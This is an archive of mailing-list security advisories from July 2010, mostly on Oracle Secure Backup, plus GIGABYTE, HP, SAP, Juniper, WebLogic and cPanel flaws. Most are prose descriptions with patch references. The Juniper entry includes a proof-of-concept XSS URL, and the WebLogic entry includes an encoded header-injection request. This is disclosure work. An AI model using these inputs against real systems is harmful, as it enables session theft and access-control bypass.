TPTI-10-04: Oracle Secure Backup Scheduler Service Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
TPTI-10-04: Oracle Secure Backup Scheduler Service Remote Code Execution 
Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-10-04

-- CVE ID:
CVE-2010-0898

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8027. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Oracle Secure Backup. User interaction is
not required to exploit this vulnerability.

The specific flaw exists in the parsing of commands sent to the
obscheduled.exe service listening by default on TCP port 1026, or 1027.
Due to a lack of bounds checking on a specific command sequence the
program stack can be overwritten with user controlled data. Successful
exploitation can lead to remote system compromise under the SYSTEM
credentials.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-03-13 - Vulnerability reported to vendor

-- Credit:
This vulnerability was discovered by:
* Cody Pierce, TippingPoint DVLabs

ZDI-10-118: Oracle Secure Backup Administration uname Authentication Bypass Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-118: Oracle Secure Backup Administration uname Authentication Bypass 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-118
July 13, 2010

-- CVSS:
9.7, (AV:N/AC:L/Au:N/C:C/I:C/A:P)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to bypass authentication on
vulnerable installations of Oracle Secure Backup. Authentication is not
required to exploit this vulnerability.

The specific flaw exists in the handling of user input to the uname
variable of the login.php script running on the administration page of
Oracle Secure Backup. Do to the lack of proper shell metacharacter
filtering it is possible to bypass the login check. Successful
exploitation of this vulnerability allows the attacker to access
sensitive information running on the administration server without
proper credentials.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-21 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

Secunia Research: GIGABYTE Dldrv2 ActiveX Control Array Indexing Vulnerability

2010-07-15 Thread Secunia Research
== 

 Secunia Research 15/07/2010

   - GIGABYTE Dldrv2 ActiveX Control Array Indexing Vulnerability -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* GIGABYTE Dldrv2 ActiveX Control 1.4.206.11

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System compromise
Where:  Remote

== 
3) Vendor's Description of Software 

GIGABYTE's Download Center allows you to quickly download and update 
your BIOS as well as the latest system drivers..

Product Link:
http://download.gigabyte.com.tw/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in GIGABYTE Dldrv2 
ActiveX Control, which can be exploited by malicious people to 
compromise a user's system.

The vulnerability is caused by missing input validation of the item
argument passed to the SetDLInfo() method and can be exploited via 
array-indexing errors to corrupt memory.

Successful exploitation allows execution of arbitrary code.

== 
5) Solution 

Set the kill-bit for the ActiveX control.

== 
6) Time Table 

18/06/2010 - Vendor notified.
29/06/2010 - Vendor response.
15/07/2010 - Public disclosure.

== 
7) Credits 

Discovered by Carsten Eiram, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2010-1518 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-86/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


ZDI-10-119: Oracle Secure Backup Administration $other Variable Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-119: Oracle Secure Backup Administration $other Variable Command 
Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-119
July 13, 2010

-- CVSS:
9, (AV:N/AC:L/Au:S/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability.

The specific flaw exists in the handling of variables to the
property_box.php script located on the Oracle Secure Backup
administration server. Due to the lack of filtering on special
characters it is possible to specify arbitrary commands to the command
line being executed by the administration server. Successful
exploitation of this can lead to remote compromise under the credentials
of the web server.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-21 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

[security bulletin] HPSBMA02439 SSRT080082 rev.3 - HP OpenView SNMP Emanate Master Agent Running on HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access

2010-07-15 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01757418
Version: 3

HPSBMA02439 SSRT080082 rev.3 - HP OpenView SNMP Emanate Master Agent Running on 
HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2009-06-15
Last Updated: 2010-07-14

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP OpenView SNMP Emanate 
Master Agent Running on HP-UX, Linux, Solaris, and Windows. The vulnerability 
could be exploited remotely to gain unauthorized access.

References: CVE-2008-0960

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView SNMP Emanate Master Agent v15.x running on HP-UX, Solaris, Linux, 
and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2008-0960(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made a patches available to resolve the vulnerability.

The patches are available from http://support.openview.hp.com/selfsolve/patches

Operating System
 Patch

HP-UX (IA)
 PHSS_39887 or subsequent

HP-UX (PA)
 PHSS_39886 or subsequent

Linux RedHatAS2.1
 LXOV_00109 or subsequent

Linux RedHat4AS-x86_64
 LXOV_00110 or subsequent

Solaris
 PSOV_03522 or subsequent

Windows
 NNM_01206 or subsequent

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

HP-UX B.11.31 (IA)
HP-UX B.11.23 (IA)
=
OVSNMPAgent.MASTER
action: install PHSS_39887 or subsequent
URL: http://support.openview.hp.com/selfsolve/patches

HP-UX B.11.31 (PA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
=
OVSNMPAgent.MASTER
action: install PHSS_39886 or subsequent
URL: http://support.openview.hp.com/selfsolve/patches

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 15 June 2009 Initial release
Version:2 (rev.2) - 22 June 2010 Patches are available
Version:3 (rev.3) - 14 July 2010 Earlier HP-UX and Solaris patches resolve the 
vulnerability

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing  Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with 

Pwnie Awards 2010

2010-07-15 Thread Alexander Sotirov
The Pwnie Awards ceremony will return for the fourth consecutive year to the
BlackHat USA conference in Las Vegas. The award ceremony will take place
during the BlackHat reception on Thr, July 29, 2010.

The Pwnie Awards is an annual awards ceremony celebrating the achievements and
failures of security researchers and the wider security community in the past
year. We're currently accepting nominations in nine award categories:

 * Best Server-Side Bug
 * Best Client-Side Bug
 * Mass 0wnage
 * Most Innovative Research
 * Lamest Vendor Response
 * Most Overhyped Bug
 * Best Song
 * Most Epic FAIL
 * Lifetime Achievement award for hackers over 30

The deadline for nominations is Thr, July 16. To submit a nomination,
visit the Pwnie Awards site at http://pwnies.com/

For more last minute information, follow @PwnieAwards on Twitter,
http://twitter.com/PwnieAwards

For questions, please email i...@pwnie-awards.org

Alexander Sotirov
Dino Dai Zovi

Pwnie Awards 2010


ZDI-10-120: Oracle Secure Backup Administration objectname Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-120: Oracle Secure Backup Administration objectname Command Injection 
Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-120
July 13, 2010

-- CVSS:
9, (AV:N/AC:L/Au:S/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8778. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability.

The specific flaw exists in the handling of variables to the
property_box.php script located on the Oracle Secure Backup
administration server. Due to the lack of filtering on special
characters it is possible to specify arbitrary commands to the command
line being executed by the administration server. Successful
exploitation of this can lead to remote compromise under the credentials
of the web server.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-21 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

PR09-16: Juniper Secure Access series (Juniper IVE) Cross-Site Scripting Vulnerability

2010-07-15 Thread research
PR09-16: Juniper Secure Access series (Juniper IVE) XSS

Vulnerability found: 12th October 2009

Severity: Medium (Script injection)

Description:

There is a Cross-site Scripting vulnerability on Juniper, IVE web interface.

Procheckup has found by making a malformed request to the IVE Web
interface without authentication, that a vanilla cross site scripting
(XSS) attack is possible.


Successfully tested on:
Juniper Networks IVE version 6.5R1 (Build 14599)

Model SA-2000


Proof of concept:

http://target-domain.foo/dana-na/auth/url_default/welcome.cgi?p=logoutc=37u=/scriptscriptalert(1)/script


Consequences:

An attacker may be able to cause execution of malicious scripting code
in the browser of a user who clicks on a link or visits a malicious
webpage. The malicious code would run in the security context of the
vulnerable website.

This type of attack can result in non-persistent defacement of the
target site, or the redirection of confidential information (i.e.:
passwords or session IDs) to unauthorised third parties.


Fix:

Ensure that the firewall's management interface is disabled on the
Internet connected interface, by disabling WeBUI within service
options on the Internet connected interface.



Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)


Legal:

Copyright 2009 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to
problems, if and only if, the Bulletin is not edited or changed in any
way, is attributed to Procheckup, and provided such
reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not
liable for any misuse of this information by any third party.


ZDI-10-121: Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-121: Command Injection Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-121
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to inject arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability but may be bypassed.

The specific flaw exists in the handling of the 'selector[0]' variable
to the script index.php used in the administration server running on
port 443. Due to improper filtering of user data a specially crafted
request could lead to arbitrary commands being executed under the
credentials of the service.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-27 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* rgod

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

ZDI-10-122: Oracle Secure Backup Administration Command Injection Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-122: Oracle Secure Backup Administration Command Injection Remote Code 
Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-122
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to inject arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit this vulnerability but may be bypassed.

The specific flaw exists in the handling of the 'preauth' variable to
the script index.php used in the administration server running on port
443. Due to improper filtering of user data a specially crafted request
could lead to arbitrary commands being executed under the credentials of
the service.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-27 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* rgod

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

ZDI-10-123: Oracle Secure Backup Administration Authentication Bypass Vulnerability

2010-07-15 Thread ZDI Disclosures
ZDI-10-123: Oracle Secure Backup Administration Authentication Bypass 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-123
July 13, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to bypass authentication on
vulnerable installations of Oracle Secure Backup.

The specific flaw exists within the register globals emulation layer
which allows attackers to specify values for arbitrary program
variables. When specific parameters are specified via the URI it is
possible for an attacker to bypass the authentication mechanism and
reach functionality otherwise inaccessible without proper credentials.
This can be leveraged by remote attackers to trigger what were post-auth
vulnerabilities without valid credentials.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-10-28 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* rgod

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

SAPGui BI wadmxhtml.dll Tags Property Heap Corruption

2010-07-15 Thread Elazar Broad
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Who
- 
SAP
http://www.sap.com

What
- 
SAPGui BI component

File:  %PROGRAMFILES%\sap\business explorer\bi\wadmxhtml.dll
Version: 7100.1.400.8
ClassID: 30DD068D-5AD9-434C-AAAC-46ABE37194EB
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
KillBitSet: False

How
- 
Vulnerable Property: Tags

The Tags property can be manipulated to trigger heap corruption
resulting in the execution of arbitrary code.


Fix
- 

SAP set the kill-bit for this control with Patch 17 for SAPGui.
Alternatively, you can set the kill-bit manually, please see
http://support.microsoft.com/kb/240797.

Credit
- 
Elazar Broad
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQECAAYFAkw/NAsACgkQi04xwClgpZiFhQP/RfjeHhaBzFZDcwpvkq8eAsE1QclV
8pqzmhDv5xXh8s+hbKYyLqLq8St/3z6reBKoHP0//BVbOSE/1CTRCyiJuKjV0SLP3qdb
vkCzrtg5eoGCKUvEWoqjE6NNysmV/P0j88T/NRBv3jkznINWAl6mf+n/JwKC4KC57wKQ
9n3IjvY=
=yNee
-END PGP SIGNATURE-



ZDI-10-124: Oracle Secure Backup Web Interface Various Post-Auth Command Injection Remote Code Execution Vulnerabilities

2010-07-15 Thread ZDI Disclosures
ZDI-10-124: Oracle Secure Backup Web Interface Various Post-Auth Command 
Injection Remote Code Execution Vulnerabilities
http://www.zerodayinitiative.com/advisories/ZDI-10-124
July 13, 2010

-- CVSS:
9, (AV:N/AC:L/Au:S/C:C/I:C/A:C)

-- Affected Vendors:
Oracle

-- Affected Products:
Oracle Secure Backup

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary commands
on vulnerable installations of Oracle Secure Backup. Authentication is
required to exploit these vulnerabilities.

The specific flaws exist due to how the application passes CGI
parameters to the internal obtool binary running on port 443. Due to
improper filtering of user data a specially crafted request could lead
to arbitrary commands being executed under the credentials of the
service.

-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

-- Disclosure Timeline:
2009-12-10 - Vulnerability reported to vendor
2010-07-13 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Andrea Micalizzi aka rgod

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

CVE-2010-2375: WebLogic Plugin HTTP Injection via Encoded URLs

2010-07-15 Thread VSR Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


 VSR Security Advisory
   http://www.vsecurity.com/


- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: WebLogic Plugin HTTP Injection via Encoded URLs
 Release Date: 2010-07-13
  Application: WebLogic Plugin
 Versions: All known versions
 Severity: High
Discovered by: Timothy D. Morgan  tmorgan (at) vsecurity {dot} com 
 Contributors: George D. Gal  ggal {at} vsecurity (dot) com 
Vendor Status: Patch Released [4]
CVE Candidate: CVE-2010-2375
Reference: http://www.vsecurity.com/resources/advisory/20100713-1/

- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- ---
The product is best described by Oracle marketing literature in:

 Oracle WebLogic Server Enterprise Edition offers enterprises the ability to
  consolidate their applications on a pool of shared servers for both high 
  efficiency and superior performance. No other application server has
  the proven performance on industry benchmarks across the most varied
  chip types and operating systems.  Sophisticated High Availability
  (HA) features built on clustered instances ensure uptime. Easy-to-use
  yet substantial management tools keep systems going without hassle or
  expense. By coalescing applications and services onto Oracle WebLogic
  Server, IT is in position to react swiftly to change and help the
  enterprise outperform the competition. -- [1]

And:
 Oracle WebLogic Server Web Server Plugins provide load balancing
  across WebLogic Server Clusters by acting as front-end proxies. While
  WebLogic Server Web Server Plugins 1.0 are bundled with WebLogic
  Server, these new WebLogic Server Web Server Plugins 1.1 are
  downloadable separately outside of WebLogic Server and deliver
  enhanced functionality and improved security. -- [2]


Vulnerability Overview
- --
Over the last several years, VSR analysts had observed unusual behavior
in multiple WebLogic deployments when certain special characters were
URL encoded and appended to URLs.  In late April, 2010 VSR began
researching this more in depth and found that the issue could allow for
HTTP header injection and HTTP request smuggling attacks.


Product Background
- --
WebLogic application server is commonly deployed in a three-tier
architecture where the application server resides behind a public-facing
web server. Oracle provides proprietary web server plugin modules for
multiple web server software packages on various platforms in order to
allow these services to act as reverse proxies and in some cases, load
balancers for multiple middle-tier WebLogic application servers.


Vulnerability Overview
- --
The vulnerability stems from the web server plugin's processing of URLs
submitted by users.  When a URL is received, it is URL decoded at some
point, but is not re-encoded prior to inclusion in requests to the
middle-tier WebLogic server.  This allows for special characters, such
as new lines, to be injected into requests directed at application
servers.

For instance, if an attacker were to send the following simple request: 

 GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
 Host: vulnerable.example.com
 Connection: close

The web server proxy module would instead send a request on to the 
application server which looks more like:

 GET /logo.gif HTTP/1.1
 X-hdr: x HTTP/1.1
 Host: vulnerable.example.com
 Connection: close

This behavior allows for a wide variety of attacks, including trusted
header injection and HTTP request smuggling.


Attack Scenarios
- 
In the simplest scenarios, an attacker could use this flaw to inject
malicious versions of headers which are considered trusted.  In certain
situations, headers are added to requests by the web server proxy module
which may be used to make decisions about authentication or access
control.  

For instance, the WL-Proxy-Client-IP header is added to requests to
indicate to the application server which IP address the client used.  If
the application server uses this to enforce IP-based access control
restrictions, then clearly this injection vulnerability could be used to
bypass this restriction.

Another example would be the injection of a WL-Proxy-Client-Cert
header.  This header is used in deployments where clients are provided
SSL/TLS client certificates for authentication.  Since web servers would
typically terminate this encrypted communication, application servers
need a way of identifying the user who was authenticated.  The
WL-Proxy-Client-Cert header is used to communicate this information between
the web server plugin and application servers.  By injecting a false
version of this header, it would be possible to impersonate other users
and perhaps avoid presenting a client certificate at all.

More complex attacks are also possible by 

cPanel XSS Vulnerability

2010-07-15 Thread thomas
cPanel 11.25 is vulnerable to an XSS exploit as it fails to clean user-supplied 
input.



All versions prior to 47010 are affected. Please note that whilst this 
vulnerability is patched in version 47010, 47010 is currently on the 
bleeding-edge and isn't recommended for the stable environment.



Successful exploitation can result in user credentials being taken and being 
used to gain escalated privileges.



References: 
http://changelog.cpanel.net/?revision=0;tree=;treeview=;show=html;pp=50


ZDI-10-125: IBM SolidDB solid.exe Handshake Request Username Field Remote Code Execution Vulnerability

2010-07-15 Thread ZDI Disclosures
